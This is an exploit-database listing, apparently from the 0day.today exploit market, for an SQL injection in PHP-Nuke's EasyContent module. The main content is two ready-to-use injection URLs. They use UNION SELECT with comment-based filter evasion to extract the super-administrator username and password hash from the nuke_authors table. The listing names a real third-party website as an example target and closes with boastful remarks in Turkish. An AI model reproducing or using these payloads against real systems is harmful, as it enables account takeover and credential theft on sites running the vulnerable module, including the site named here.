[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHP-Nuke Module EasyContent (page_id) SQL Injection Vulnerability

Author
xoron
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2666
Category
web applications
Date add
19-02-2008
Platform
unsorted
=================================================================
PHP-Nuke Module EasyContent (page_id) SQL Injection Vulnerability
=================================================================



-------------------------------------------------------------------------------
php-nuke modules EasyContent remote sql inj
-------------------------------------------------------------------------------
found =xoron
-------------------------------------------------------------------------------
modules.php?op=modload&name=EasyContent&file=index&menu=410&page_id=-1/**/union/**/select/**/0,aid/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
modules.php?op=modload&name=EasyContent&file=index&menu=410&page_id=-1/**/union/**/select/**/0,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
-------------------------------------------------------------------------------
Example: http://eurowards.org/content/

not: password and username in title! colomb number 1

not2: Adam gibi bug bulunda dolan?n ortalarda, istenilince ne kadar bos bug varsa bole post edilir milw0rma.
ise yarar bug nas?l hit yap?yor gormek istiyorsan?z

Herzmn kral benimdir!



#  0day.today [2024-11-16]  #